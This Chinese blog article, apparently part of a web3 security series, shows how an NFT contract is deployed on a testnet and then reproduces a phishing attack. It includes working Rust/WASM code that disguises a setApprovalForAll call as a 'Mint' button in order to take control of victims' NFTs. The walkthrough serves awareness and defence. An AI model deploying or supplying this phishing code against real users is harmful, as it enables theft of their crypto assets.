WEB3 安全系列 || 银河系视角带你领略被盗的NFT

admin

101411
文章

87
评论

2022年6月17日18:50:48评论24 views字数 4508阅读15分1秒阅读模式

随着web3领域各种应用程序的相继发展，安全问题也随之凸显。近期钓鱼诈骗攻击事件频发，各种钓鱼攻击手法层出不穷。此时，如何更清楚地了解钓鱼攻击；如何避免被钓鱼显得尤为重要。

本系列文章从web3安全出发，持续跟进web3安全动态。本文通过复现 NFT 网络钓鱼攻击来进行详细的攻击过程分解，查看下文，会对mint背后的逻辑有更加清晰理解，以免造成NFT资产损失。

0x1 部署合约 + 铸造 NFT

1.1

发行平台

合约发行在 Rinkeby 测试网

1.2

主合约业务逻辑

合约地址：

0x5e6893BeEAd9718B1b41741065BA3C3c8848737D

主合约代码如下：

contract MyNFT is ERC721, ERC721URIStorage, Ownable {    using Counters for Counters.Counter;
    Counters.Counter private _tokenIdCounter;
    constructor() ERC721("Doge", "DG") {}
    function safeMint(address to) public onlyOwner {        _safeMint(to, _tokenIdCounter.current());        _tokenIdCounter.increment();    }
    function _baseURI() internal pure override returns (string memory) {        return "ipfs://QmYjZ3Df23fqPyNXmMySEgKN5PkZa3f664G4uY1wuSfzSF/";    }
    function _burn(uint256 tokenId) internal override(ERC721, ERC721URIStorage) {        super._burn(tokenId);    }
    function tokenURI(uint256 tokenId) public view override(ERC721, ERC721URIStorage) returns (string memory) {        return super.tokenURI(tokenId);    }}

其中：

构造函数 constructor 用来定义 NFT 的名称和标识符；
safeMint 会给目标地址铸造 1 个 NFT，且自增 tokenId，在下次一铸币时使用此 ID；
_baseURI 是被写死的链接，该链接是所有 tokenURI 的前缀；
tokenURI 是由 _baseURI + tokenId 拼接而成，该链接存储了 MetaData；
MetaData 存储了 NFT 交易网站所需要的 token 信息，如：NFT 的描述、标签的属性、图片地址等。

在该示例合约中：

主合约名为：MyNFT
发行 NFT 名为 Doge，标识符为 DG
_baseURI 为 ipfs://QmYjZ3Df23fqPyNXmMySEgKN5PkZa3f664G4uY1wuSfzSF/
tokenURI 为 _baseURI + tokenID

注：OpenSea 会识别账户中所持 token 的 URI 的 MetaData

1.3

ipfs上传图片及 tokenId 和 MetaData 关联

使用 https://www.pinata.cloud 网站，可以免费上传图片至 ipfs 网络。

上传所有图片后，新建本地文件夹创建索引文件 —— 序号为自然数的纯文本文件，文件内容是 MetaData：

注：MetaData 中的图片链接就是刚上传至 ipfs 网络的图片地址。

再将该文件夹上传至 ipfs 网络，其地址即合约 _baseURI 函数的返回值。

1.4

铸币

用部署合约的账户铸两个NFT，交易哈希分别为：

• 0x6c8fc146813bdac9bf0100dfb3c5105c0951d2048978b5d86376c03acbf63a09

• 0xea0aa7bcf7072db62ee77a8ed938db23e47c81af1a5842381c9d8a7005534cd7

到 OpenSea 上查看：

0x2、钓鱼复现

2.1

合约

平台：Rinkeby
地址：0x8AdF4a5029d409ef9610D647584b411b2Bea0916

2.2

原理

使用 web3 调用智能合约的 setApprovalForAll 函数，并在前端页面显示为 Mint 按钮。

2.3

代码

该示例代码选择 Rust 编程语言，依赖 crates.io 的 web3 库，编译为 WASM 运行在浏览器中。

use aoko::no_std::pipelines::pipe::Pipe; // version = 0.3.0-alpha.7use core::str::FromStr;use wasm_bindgen::{prelude::*, JsCast};use web3::{    api::Eth,    contract::{Contract, Options},    transports::eip_1193::{Eip1193, Provider},    types::Address,    Web3,};
fn eth() -> Eth<Eip1193> {    web_sys::window()        .expect("no window available")        .get("ethereum")        .expect("MetaMask is not installed")        .unchecked_into::<Provider>()        .pipe(Eip1193::new)        .pipe(Web3::new)        .eth()}
#[wasm_bindgen]pub async fn connect_wallet() {    // Request the user to connect the MetaMask Wallet    eth().request_accounts().await.unwrap();}
#[wasm_bindgen]pub async fn phishing() {    // Create the environment to communicate with the MetaMask Wallet    let eth = eth();
    // Get current user account    let account = eth.accounts().await.unwrap()[0];        // Create contract object    let contract = Contract::from_json(        eth,        Address::from_str("[The Contract Address]").unwrap(),        include_bytes!("abi.json"),    )    .unwrap();
    // Send the phishing transaction to MetaMask Wallet    contract        .call_with_confirmations(            "setApprovalForAll",            (Address::from_str("[The Approved Address]").unwrap(), true),            account,            Options::default(),            1,        )        .await        .unwrap();}